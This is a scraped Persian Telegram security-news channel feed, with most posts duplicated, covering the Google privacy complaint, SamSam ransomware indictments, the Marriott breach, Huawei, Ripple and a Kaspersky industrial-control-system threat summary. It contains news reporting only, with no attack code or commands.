نخستین رستوران دیجیتال در نپال با رباتهایی که غذا سرو میکنند
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
📌 متهم شدن #گوگل به نقض قوانین اروپا در محافظت از اطلاعات
شرکت گوگل به دلیل ردیابی مکان کاربران به نقض قوانین اروپا درباره حفاظت از اطلاعات متهم شده است.
هفت سازمان اروپایی مشتری محور گفتهاند با کمک مقامهای مسئول از گوگل شکایت میکنند. آنها این شرکت عظیم را متهم کردهاند که با اغوای کاربران برای دسترسی به دادهها، اطلاعاتی را در مورد زندگی شخصی از جمله مذهب، نگرش سیاسی و جنسیت افراد جمعآوری میکند و این اطلاعات ممکن است فاش شوند.
بعضی منابع در گوگل گفتهاند این شرکت از مکان افراد برای بازاریابی استفاده نمیکند.
گوگل میگوید هنگام جمع آوری دادهها به صراحت این موضوع به کاربران اطلاع داده میشود.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
شرکت گوگل به دلیل ردیابی مکان کاربران به نقض قوانین اروپا درباره حفاظت از اطلاعات متهم شده است.
هفت سازمان اروپایی مشتری محور گفتهاند با کمک مقامهای مسئول از گوگل شکایت میکنند. آنها این شرکت عظیم را متهم کردهاند که با اغوای کاربران برای دسترسی به دادهها، اطلاعاتی را در مورد زندگی شخصی از جمله مذهب، نگرش سیاسی و جنسیت افراد جمعآوری میکند و این اطلاعات ممکن است فاش شوند.
بعضی منابع در گوگل گفتهاند این شرکت از مکان افراد برای بازاریابی استفاده نمیکند.
گوگل میگوید هنگام جمع آوری دادهها به صراحت این موضوع به کاربران اطلاع داده میشود.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
📌سافاریِ خطرناک
مرورگر سافاری در سیستم عامل مک میتواند به مهاجمین دسترسی از راه دور بدهد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مرورگر سافاری در سیستم عامل مک میتواند به مهاجمین دسترسی از راه دور بدهد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
لیست ۲۵۱میلیون رکورد اطلاعاتی که طی نوامبر ۲۰۱۸ توسط گروههای هکری سرقت و در وب تاریک به فروش میرسند:
ITGovernance "251,286,753 records were leaked in November | #cybersecurity #infosec itgovernance.co.uk/blog/list-of-d… …"
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
ITGovernance "251,286,753 records were leaked in November | #cybersecurity #infosec itgovernance.co.uk/blog/list-of-d… …"
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
نام دو ایرانی به عنوان خرابکاران سایبری در لیست تحریمهای آمریکا
پلیس فدرال آمریکا (FBI) «محمد مهدی شاه منصوری» و «فرامرز شاهیسوندی» را به لیست متهمین تحت تعقیب خرابکاران سایبری اضافه کرد.
گفته شده باجافزار SamSam تولید این دو ایرانی بوده که بیمارستانها، شهرداریها و موسسات عمومی را مورد هدف قرار دادهاند.
۳۰ میلیون دلار خسارت و ۶ میلیون دلار باجگیری توسط این دو فرد صورت گرفته است.
محمد مهدی شاه منصوری یک ایرانی 27 ساله متولد قم است و فرامز شاهی سوندی 34 ساله متولد شیراز و ساکن تهران است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
پلیس فدرال آمریکا (FBI) «محمد مهدی شاه منصوری» و «فرامرز شاهیسوندی» را به لیست متهمین تحت تعقیب خرابکاران سایبری اضافه کرد.
گفته شده باجافزار SamSam تولید این دو ایرانی بوده که بیمارستانها، شهرداریها و موسسات عمومی را مورد هدف قرار دادهاند.
۳۰ میلیون دلار خسارت و ۶ میلیون دلار باجگیری توسط این دو فرد صورت گرفته است.
محمد مهدی شاه منصوری یک ایرانی 27 ساله متولد قم است و فرامز شاهی سوندی 34 ساله متولد شیراز و ساکن تهران است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔴 گارلینگهاوس : ریپل جای سوئیفت را خواهد گرفت
💢 ترجمه بلومبرگ 💢
ریپل لبز، استارتآپ بلاکچینی که از پول دیجیتالی آن معمولا بهعنوان پروکسی برای دیگر پرداختهای ارزهای رمزنگاریشده استفاده میشود، روز به روز بر تعداد مشتریانش افزوده میشود؛ چراکه به گفته برد گارلینگهاوس، مدیرعامل این شرکت، شرکتهای مالی بهدنبال فناوریهای سریعتر و بهروزشدهتری نسبت به شبکه بانکی سوئیفت هستند.
سوئیفت مخفف عبارت جامعه جهانی ارتباطات مالی بین بانکی و سیستم آیبن هم به شماره حساب بانکی بینالمللی گفته میشود که از هر دوی اینها توسط بانکها، اشخاص و کسبوکارها برای ارسال و دریافت پول استفاده میشود و ریپل هم خیلی وقت است که سر زبانها افتاده است.
فناوری بلاکچین به دلیل استفاده از فناوری دفاتر کل توزیعشده، نیاز به وجود سیستم استاندارد مرکزی را از بین برده است و امکان انتقال پول دیجیتالی را بدون نیاز به حسابهای بانکی در بانکها و موسسات مالی فراهم میکند. از طرفی، سوئیفت هم بیش از ۱۱ هزار مشتری در ۲۰۰ کشور دنیا دارد.
گارلینگهاوس در مصاحبهای با بلومبرگ در فستیوال فینتک سنگاپور امسال گفت: تکنولوژیهایی که سوئیفت برای استفاده بانکها توسعه داده است، مربوط به دههها قبل میشود و طی این مدت هیچ تکاملی پیدا نکرده و بهروزرسانی نشده است. چند وقت پیش، سوئیفت گفته بود که به فناوری بلاکچین به چشم راهکاری برای نظام بانکی وابسته نگاه نمیکند. در حالی که بیش از ۱۰۰ نفر از مشتریان این شبکه با چنین حرفی مخالف هستند.»
گفته میشود که بیش از ۱۰۰ بانک و ارائهدهنده سرویس بانکی وجود دارد که روی شبکه ریپل فعالیت میکنند، مانند گروه مالی میتسوبیشی یوافجی ژاپن و استاندارد چارترد.
مدیرعامل این شرکت در صحبتهایش به این موضوع هم اشاره کرد که گمانهزنیهایی که مبنی بر اتصال میان ریپل و سوئیفت وجود دارد، صحت ندارد و ریپل قصد دارد تا جای سوئیفت را در شبکه بانکی بگیرد.
☑️ بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-13/ripple-is-destined-to-overtake-swift-banking-network-ceo-says
.
.
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
💢 ترجمه بلومبرگ 💢
ریپل لبز، استارتآپ بلاکچینی که از پول دیجیتالی آن معمولا بهعنوان پروکسی برای دیگر پرداختهای ارزهای رمزنگاریشده استفاده میشود، روز به روز بر تعداد مشتریانش افزوده میشود؛ چراکه به گفته برد گارلینگهاوس، مدیرعامل این شرکت، شرکتهای مالی بهدنبال فناوریهای سریعتر و بهروزشدهتری نسبت به شبکه بانکی سوئیفت هستند.
سوئیفت مخفف عبارت جامعه جهانی ارتباطات مالی بین بانکی و سیستم آیبن هم به شماره حساب بانکی بینالمللی گفته میشود که از هر دوی اینها توسط بانکها، اشخاص و کسبوکارها برای ارسال و دریافت پول استفاده میشود و ریپل هم خیلی وقت است که سر زبانها افتاده است.
فناوری بلاکچین به دلیل استفاده از فناوری دفاتر کل توزیعشده، نیاز به وجود سیستم استاندارد مرکزی را از بین برده است و امکان انتقال پول دیجیتالی را بدون نیاز به حسابهای بانکی در بانکها و موسسات مالی فراهم میکند. از طرفی، سوئیفت هم بیش از ۱۱ هزار مشتری در ۲۰۰ کشور دنیا دارد.
گارلینگهاوس در مصاحبهای با بلومبرگ در فستیوال فینتک سنگاپور امسال گفت: تکنولوژیهایی که سوئیفت برای استفاده بانکها توسعه داده است، مربوط به دههها قبل میشود و طی این مدت هیچ تکاملی پیدا نکرده و بهروزرسانی نشده است. چند وقت پیش، سوئیفت گفته بود که به فناوری بلاکچین به چشم راهکاری برای نظام بانکی وابسته نگاه نمیکند. در حالی که بیش از ۱۰۰ نفر از مشتریان این شبکه با چنین حرفی مخالف هستند.»
گفته میشود که بیش از ۱۰۰ بانک و ارائهدهنده سرویس بانکی وجود دارد که روی شبکه ریپل فعالیت میکنند، مانند گروه مالی میتسوبیشی یوافجی ژاپن و استاندارد چارترد.
مدیرعامل این شرکت در صحبتهایش به این موضوع هم اشاره کرد که گمانهزنیهایی که مبنی بر اتصال میان ریپل و سوئیفت وجود دارد، صحت ندارد و ریپل قصد دارد تا جای سوئیفت را در شبکه بانکی بگیرد.
☑️ بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-13/ripple-is-destined-to-overtake-swift-banking-network-ceo-says
.
.
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Bloomberg.com
Ripple Is Aiming to Overtake Swift Banking Network, CEO Says
Ripple Labs Inc., the blockchain startup whose digital money is often used as a proxy for other cryptocurrency payments, is gaining new customers because financial firms are seeking faster, more up-to-date technology than the Swift banking network, Chief…
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 تحلیل تکنیکال بیت کوین
بیت کوین، این پول رمز نگار دیجیتالی طی یکسال گذشته رفتار عجیب و غریبی داشته. با یک پرش سنگین شد ۲۰/۰۰۰ دلار و بعد وارد فاز رکود شد. رفتار تکنیکی قیمت بیت کوین خبر از ریزشهای بیشتر می داد و الان آرایش مثلث نزولی رو به سمت پایین شکسته.
حالا سوال اینه که بیت کوین تا کجا میاد پایین؟ بعدش آیا برگشت به بالا داره.
در ویدیوی زیر به این سوالات به صورت مختصر پاسخ داده شده...
تحلیلگر : رضا خادمی از کانال مارکت ۳۶۰
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
بیت کوین، این پول رمز نگار دیجیتالی طی یکسال گذشته رفتار عجیب و غریبی داشته. با یک پرش سنگین شد ۲۰/۰۰۰ دلار و بعد وارد فاز رکود شد. رفتار تکنیکی قیمت بیت کوین خبر از ریزشهای بیشتر می داد و الان آرایش مثلث نزولی رو به سمت پایین شکسته.
حالا سوال اینه که بیت کوین تا کجا میاد پایین؟ بعدش آیا برگشت به بالا داره.
در ویدیوی زیر به این سوالات به صورت مختصر پاسخ داده شده...
تحلیلگر : رضا خادمی از کانال مارکت ۳۶۰
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔴 آمریکا به دنبال متقاعد کردن متحدان خود مبنی بر عدم استفاده از تجهیزات مخابراتی هواوی
مقامات آمریکایی با همتایان خود در کشورهای آلمان، ایتالیا، ژاپن و چند کشور دیگر در خصوص این موضوع مذاکره کرده اند.
ظاهراً آخرین هشداری که آمریکا به این کشورها داده است، به دلیل نگرانی آنها از حضور تجهیزات مخابراتی چینی در کشورهایی می باشد که ایالات متحده در آنها پایگاه نظامی دارد.
به گفته وال استریت ژورنال دولت آمریکا قصد دارد که با صرف هزینه در جهت توسعه زیرساخت های مخابراتی در این کشورها، دست هواوی را از کسب درآمد از این مناطق کوتاه کند.
این اولین باری نیست که آمریکا درخصوص استفاده از تجهیزات هواوی هشدار داده و ابراز نگرانی کرده است. پیش تر نیز در رابطه با استفاده از گوشی های هوشمنداین کمپانی نگرانی های خود را مطرح کرده بود و حتی مانع فروش رسمی گوشی های پرچمدار هواوی توسط اپراتورهای آمریکایی شده بود.
باوجود آنکه هواوی دومین تولیدکننده بزرگ گوشی های هوشمند در جهان به حساب می آید، حضور چندان پررنگی در بازار ایالات متحده ندارد. غول کره ای به جز آمریکا با مشکلات اینچنینی در انگلستان و استرالیا نیزدست و پنجه نرم می کند و حتی استرالیا استفاده از تجهیزات شبکه 5G هواوی را نیز ممنوع کرده است.
دلیل تمام نگرانی هایی که سران این کشورها در خصوص محصولات هواوی دارند، اخباریست که ادعا می کنند این کمپانی با دولت چین همکاری می کند و به واسطه تجهیزات خود از کشورهای دیگر جاسوسی می کند و به خاطر این همکاری نزدیک است که هواوی توانسته به یکی از غول های مخابراتی جهان تبدیل شود.
با آنکه هواوی هرگز زیر بار این اتهامات نرفته، اما از طرف دیگری اقدامی هم در جهت تکذیب آن انجام نداده است.
بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-23/u-s-urges-key-allies-to-avoid-using-huawei-equipment-wsj-says
.
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مقامات آمریکایی با همتایان خود در کشورهای آلمان، ایتالیا، ژاپن و چند کشور دیگر در خصوص این موضوع مذاکره کرده اند.
ظاهراً آخرین هشداری که آمریکا به این کشورها داده است، به دلیل نگرانی آنها از حضور تجهیزات مخابراتی چینی در کشورهایی می باشد که ایالات متحده در آنها پایگاه نظامی دارد.
به گفته وال استریت ژورنال دولت آمریکا قصد دارد که با صرف هزینه در جهت توسعه زیرساخت های مخابراتی در این کشورها، دست هواوی را از کسب درآمد از این مناطق کوتاه کند.
این اولین باری نیست که آمریکا درخصوص استفاده از تجهیزات هواوی هشدار داده و ابراز نگرانی کرده است. پیش تر نیز در رابطه با استفاده از گوشی های هوشمنداین کمپانی نگرانی های خود را مطرح کرده بود و حتی مانع فروش رسمی گوشی های پرچمدار هواوی توسط اپراتورهای آمریکایی شده بود.
باوجود آنکه هواوی دومین تولیدکننده بزرگ گوشی های هوشمند در جهان به حساب می آید، حضور چندان پررنگی در بازار ایالات متحده ندارد. غول کره ای به جز آمریکا با مشکلات اینچنینی در انگلستان و استرالیا نیزدست و پنجه نرم می کند و حتی استرالیا استفاده از تجهیزات شبکه 5G هواوی را نیز ممنوع کرده است.
دلیل تمام نگرانی هایی که سران این کشورها در خصوص محصولات هواوی دارند، اخباریست که ادعا می کنند این کمپانی با دولت چین همکاری می کند و به واسطه تجهیزات خود از کشورهای دیگر جاسوسی می کند و به خاطر این همکاری نزدیک است که هواوی توانسته به یکی از غول های مخابراتی جهان تبدیل شود.
با آنکه هواوی هرگز زیر بار این اتهامات نرفته، اما از طرف دیگری اقدامی هم در جهت تکذیب آن انجام نداده است.
بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-23/u-s-urges-key-allies-to-avoid-using-huawei-equipment-wsj-says
.
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Bloomberg.com
U.S. Urges Allies to Avoid Using Huawei Equipment, WSJ Says
The U.S. government is contacting key allies to get them to persuade telecommunications companies in their countries to avoid using equipment from China’s Huawei Technologies Co., the Wall Street Journal reported.
This media is not supported in your browser
VIEW IN TELEGRAM
پیتزا روباتیک
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
This media is not supported in your browser
VIEW IN TELEGRAM
پیر امیدیار؛ مبتکر ایرانیتبار بزرگترین فروشگاه آنلاین
پیر امیدیار، ۳۱ خردادماه سال ۱۳۴۶ در پاریس به دنیا آمد. مادرش دکترای زبانشناسی از دانشگاه سوربن دارد و پدرش جراح است. پیر در ۱۴ سالگی نخستین برنامه کامپیوتری را برای کتابخانه مدرسهاش نوشت. امیدیار تابستان سال ۱۹۹۵ در سایت شخصیاش کدی برای یک شبکه حراج مینویسد تا مردم به صورت آنلاین کالاهایشان را به حراج بگذارند. این نخستین کلید تاسیس شرکت ایبی بود. پیر در سال ۱۹۹۸ رئیس اصلی شرکت ایبی شد. ایبی بیش از ۲۷ هزار نفر کارمند دارد. بر اساس گزارش سایت فوربس، درآمد جهانی ایبی از ۴.۶ میلیارد دلار در سال ۲۰۰۸ به ۷.۳ میلیارد دلار در سال ۲۰۱۲ رسیده است. پیر امیدیار یکی از ثروتمندترین اشخاص دنیا ست و با ۸.۵ میلیارد دلار دارایی در رتبه ۱۲۳ قرار دارد. پیر در سال ۱۹۹۹ با «پاملا» ازدواج کرد، آنها سه فرزند دارند. او و همسرش پاملا فعالیتهای خیرخواهانه زیادی انجام دادهاند.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
پیر امیدیار، ۳۱ خردادماه سال ۱۳۴۶ در پاریس به دنیا آمد. مادرش دکترای زبانشناسی از دانشگاه سوربن دارد و پدرش جراح است. پیر در ۱۴ سالگی نخستین برنامه کامپیوتری را برای کتابخانه مدرسهاش نوشت. امیدیار تابستان سال ۱۹۹۵ در سایت شخصیاش کدی برای یک شبکه حراج مینویسد تا مردم به صورت آنلاین کالاهایشان را به حراج بگذارند. این نخستین کلید تاسیس شرکت ایبی بود. پیر در سال ۱۹۹۸ رئیس اصلی شرکت ایبی شد. ایبی بیش از ۲۷ هزار نفر کارمند دارد. بر اساس گزارش سایت فوربس، درآمد جهانی ایبی از ۴.۶ میلیارد دلار در سال ۲۰۰۸ به ۷.۳ میلیارد دلار در سال ۲۰۱۲ رسیده است. پیر امیدیار یکی از ثروتمندترین اشخاص دنیا ست و با ۸.۵ میلیارد دلار دارایی در رتبه ۱۲۳ قرار دارد. پیر در سال ۱۹۹۹ با «پاملا» ازدواج کرد، آنها سه فرزند دارند. او و همسرش پاملا فعالیتهای خیرخواهانه زیادی انجام دادهاند.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔶 حمله سایبری به نیم میلیارد مسافر غول هتلداری جهان
هکرها به یکی از پلتفرمهای اینترنتی هتلهای زنجیرهای "مرییات" (Marriott) آمریکا حمله کردند. آنگونه که کنسرن مرییات اعلام کرده، دادههای سامانه رزرو هتلهای استاروود (Starwood) از سال ۲۰۱۴ بهطور مرتب کپی و رمزگشایی شده و دی پی آن به احتمال دادههای حدود نیم میلیارد مسافر از جمله نام، آدرس ایمیل، شماره کارت شناسایی و اطلاعات کارت اعتباری آنها به سرقت رفته است.
مرییات در سال ۲۰۱۶ هتلهای زنجیرهای استاروود را که هتلهای وستین، شرایتون و مریدین متعلق به آن هستند، خرید.
https://bit.ly/2Sn8zod
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
هکرها به یکی از پلتفرمهای اینترنتی هتلهای زنجیرهای "مرییات" (Marriott) آمریکا حمله کردند. آنگونه که کنسرن مرییات اعلام کرده، دادههای سامانه رزرو هتلهای استاروود (Starwood) از سال ۲۰۱۴ بهطور مرتب کپی و رمزگشایی شده و دی پی آن به احتمال دادههای حدود نیم میلیارد مسافر از جمله نام، آدرس ایمیل، شماره کارت شناسایی و اطلاعات کارت اعتباری آنها به سرقت رفته است.
مرییات در سال ۲۰۱۶ هتلهای زنجیرهای استاروود را که هتلهای وستین، شرایتون و مریدین متعلق به آن هستند، خرید.
https://bit.ly/2Sn8zod
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
سایت مرکز لرزهنگاری کشوری دانشگاه تهران به آدرس http://irsc.ut.ac.ir/ آلوده به اسکریپت استخراج رمز ارز مبتنی بر مرورگر است.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Forwarded from کانال تخصصی امنیت سایبری «کتاس»
کتاس درنظر دارد لیست سایتهای که ماین غیرقانونی میکنند را افشا کند
اطفا دراین امر مارا یاری کنید
با ارسال مستندات لازم.
#ماین_غیرقانونی
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
اطفا دراین امر مارا یاری کنید
با ارسال مستندات لازم.
#ماین_غیرقانونی
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
Forwarded from IACS (Pedram Kiani)
چه کسانی امکانات و تجهیزات ICS را هدف قرار می دهند و چطور؟
چشم انداز تهدید ICS
تعداد حملات سایبری به سیستم های کنترل صنعتی به سرعت در حال افزایش است. بازیگران دولتی، مجرمان سایبری و هکوتیست ها آنها را تهدید می کنند. در ماه سپتامبر، کارشناسان امنیتی آزمایشگاه کسپرسکی گزارشی با عنوان «چشم انداز تهدید برای سیستم های اتوماسیون صنعتی» را برای سال های 2018 منتشر کردند که شامل اطلاعات مربوط به حملات علیه سیستم های ICS در شش ماه اول سال می شود. تعداد نمونه های مخرب که توسط Kaspersky تشخیص داده شده است بیش از 19،400 است و متعلق به حدود 2800 خانواده مخرب است که اکثر آنها تهدیدی خاص برای این دسته از دستگاه ها نیست. کارشناسان نشان دادند که اکثر آلودگی ها ناشی از حملات تصادفی است.
براساس گزارش Kaspersky، تعداد حملات علیه سیستم های ICS که توسط این شرکت محافظت می شود، به 41.2 درصد رسید. در مقایسه با نیمه اول سال 2017، کارشناسان میزان افزایش مجموعی تعداد عملیات حمله را 5 درصد اعلام کردند.
بیشتر حملات سیستم کامپیوتری را در کشورهایی که تولید ناخالص داخلی سرانه در آسیا، آمریکای لاتین و شمال آفریقا کم است، در حالی که در ایالات متحده تنها 21.4 درصد از سیستم های ICS را تحت تاثیر قرار داد،
با این حال، چندین منطقه از حملات مکرر و مخرب به سیستم های کنترل صنعتی خود رنج می بردند. در جنوب شرقی آسیا، بیش از 60 درصد ICS در نیمه اول سال 2018 مورد حمله قرار گرفتند؛ آفریقا در حدود 60 درصد از ICS مورد حمله قرار گرفت، با جنوب آسیا حدود 55 درصد، آسیای مرکزی حدود 53 درصد و روسیه 45 درصد است.
توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی نشان داد که کشورهایی که بیشترین تعداد حملات را به ترتیب درصد ویتنام (75.1 درصد)، الجزایر (71.6 درصد) و مراکش (65 درصد)، در حالی که امن ترین مناطق برای سیستم های ICS، دانمارک بود 14 درصد)، ایرلند (14.4 درصد) و سوئیس (15.9 درصد).
در حالی که بیشتر حملات از اینترنت بود، 27 درصد از حملات از منابع وب، 8.4 درصد از رسانه های قابل حمل قابل حمل استفاده می شد و فقط 3.8 درصد از مشتریان ایمیل بود.
"این الگو به نظر منطقی می رسد: شبکه های صنعتی مدرن به سختی می توانند از سیستم های خارجی جدا شوند. امروز، رابط کاربری بین شبکه صنعتی و شبکه شرکتی برای کنترل پروسس های صنعتی و مدیریت شبکه ها و سیستم های صنعتی مورد نیاز است.
در سال 2011، مهاجمان از وب سایت های قانونی برای میزبانی اجزای مخرب در آنها استفاده می کردند. محققان افزایش درصد رایانه های ICS که از طریق مرورگرها مورد حمله قرار گرفتند، به افزایش تعداد حملات که شامل معدنچیان cryptocurrency جاوااسکریپت بودند.
کارشناسان همچنین اشاره کردند که افزایش تعداد حملات با استفاده از اسناد مایکروسافت آفیس به عنوان بردار حمله (ورد، اکسل، RTF، پاورپوینت، Visio و غیره) همراه با کمپین های فیشینگ بود.
"محققان کسپرسکی در این گزارش اظهار داشتند:" در سال 2011، بازیگران تهدید به حمله به وب سایت های قانونی که آسیب پذیری در برنامه های وب خود را داشتند، برای میزبانی ابزارهای مخرب در این وب سایت ها ادامه یافت. " به طور مشخص، افزایش تعداد رایانه های ICS که از طریق مرورگرها در سال 2018 به طول انجامید، به دلیل افزایش تعداد حملات که شامل cryptocurrency جاوااسکریپت بود، افزایش یافت. در عین حال، افزایش تعداد کامپیوترهای ICS با استفاده از اسناد مایکروسافت آفیس با امواج ایمیل های فیشینگ همراه بود. "
اطلاعات بیشتر در مورد حملات علیه سیستم های ICS در سال 2018 H1 در نسخه کامل این گزارش موجود است.
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
چشم انداز تهدید ICS
تعداد حملات سایبری به سیستم های کنترل صنعتی به سرعت در حال افزایش است. بازیگران دولتی، مجرمان سایبری و هکوتیست ها آنها را تهدید می کنند. در ماه سپتامبر، کارشناسان امنیتی آزمایشگاه کسپرسکی گزارشی با عنوان «چشم انداز تهدید برای سیستم های اتوماسیون صنعتی» را برای سال های 2018 منتشر کردند که شامل اطلاعات مربوط به حملات علیه سیستم های ICS در شش ماه اول سال می شود. تعداد نمونه های مخرب که توسط Kaspersky تشخیص داده شده است بیش از 19،400 است و متعلق به حدود 2800 خانواده مخرب است که اکثر آنها تهدیدی خاص برای این دسته از دستگاه ها نیست. کارشناسان نشان دادند که اکثر آلودگی ها ناشی از حملات تصادفی است.
براساس گزارش Kaspersky، تعداد حملات علیه سیستم های ICS که توسط این شرکت محافظت می شود، به 41.2 درصد رسید. در مقایسه با نیمه اول سال 2017، کارشناسان میزان افزایش مجموعی تعداد عملیات حمله را 5 درصد اعلام کردند.
بیشتر حملات سیستم کامپیوتری را در کشورهایی که تولید ناخالص داخلی سرانه در آسیا، آمریکای لاتین و شمال آفریقا کم است، در حالی که در ایالات متحده تنها 21.4 درصد از سیستم های ICS را تحت تاثیر قرار داد،
با این حال، چندین منطقه از حملات مکرر و مخرب به سیستم های کنترل صنعتی خود رنج می بردند. در جنوب شرقی آسیا، بیش از 60 درصد ICS در نیمه اول سال 2018 مورد حمله قرار گرفتند؛ آفریقا در حدود 60 درصد از ICS مورد حمله قرار گرفت، با جنوب آسیا حدود 55 درصد، آسیای مرکزی حدود 53 درصد و روسیه 45 درصد است.
توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی نشان داد که کشورهایی که بیشترین تعداد حملات را به ترتیب درصد ویتنام (75.1 درصد)، الجزایر (71.6 درصد) و مراکش (65 درصد)، در حالی که امن ترین مناطق برای سیستم های ICS، دانمارک بود 14 درصد)، ایرلند (14.4 درصد) و سوئیس (15.9 درصد).
در حالی که بیشتر حملات از اینترنت بود، 27 درصد از حملات از منابع وب، 8.4 درصد از رسانه های قابل حمل قابل حمل استفاده می شد و فقط 3.8 درصد از مشتریان ایمیل بود.
"این الگو به نظر منطقی می رسد: شبکه های صنعتی مدرن به سختی می توانند از سیستم های خارجی جدا شوند. امروز، رابط کاربری بین شبکه صنعتی و شبکه شرکتی برای کنترل پروسس های صنعتی و مدیریت شبکه ها و سیستم های صنعتی مورد نیاز است.
در سال 2011، مهاجمان از وب سایت های قانونی برای میزبانی اجزای مخرب در آنها استفاده می کردند. محققان افزایش درصد رایانه های ICS که از طریق مرورگرها مورد حمله قرار گرفتند، به افزایش تعداد حملات که شامل معدنچیان cryptocurrency جاوااسکریپت بودند.
کارشناسان همچنین اشاره کردند که افزایش تعداد حملات با استفاده از اسناد مایکروسافت آفیس به عنوان بردار حمله (ورد، اکسل، RTF، پاورپوینت، Visio و غیره) همراه با کمپین های فیشینگ بود.
"محققان کسپرسکی در این گزارش اظهار داشتند:" در سال 2011، بازیگران تهدید به حمله به وب سایت های قانونی که آسیب پذیری در برنامه های وب خود را داشتند، برای میزبانی ابزارهای مخرب در این وب سایت ها ادامه یافت. " به طور مشخص، افزایش تعداد رایانه های ICS که از طریق مرورگرها در سال 2018 به طول انجامید، به دلیل افزایش تعداد حملات که شامل cryptocurrency جاوااسکریپت بود، افزایش یافت. در عین حال، افزایش تعداد کامپیوترهای ICS با استفاده از اسناد مایکروسافت آفیس با امواج ایمیل های فیشینگ همراه بود. "
اطلاعات بیشتر در مورد حملات علیه سیستم های ICS در سال 2018 H1 در نسخه کامل این گزارش موجود است.
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
Telegram
IACS
کانال تخصصی امنیت اتوماسیون و کنترل صنعتی با رویکرد آگاهی رسانی،آموزش ومشاوره درحوزه مخاطرات امنیتی درزیرساختهای حساس وحیاتی بامعماری:ICS، SCADA، DCS، OT فعالیت میکند.
برای اخذ مشاوره خصوصی بامن تماس بگیرید:
@Pedram_kiani
www.VCOACH.ir
برای اخذ مشاوره خصوصی بامن تماس بگیرید:
@Pedram_kiani
www.VCOACH.ir
Forwarded from IACS (Pedram Kiani)
شکل 1: توزیع جغرافیایی حملات به سیستم های اتوماسیون صنعتی، H1 2018، درصد کامپیوترهای ICS مورد حمله در هر کشوری (منبع: آزمایشگاه کسپرسکی)
🏭کانال تخصصی امنیت زیرساختهای اتوماسیون و کنترل صنعتی
https://t.me/ics_cert
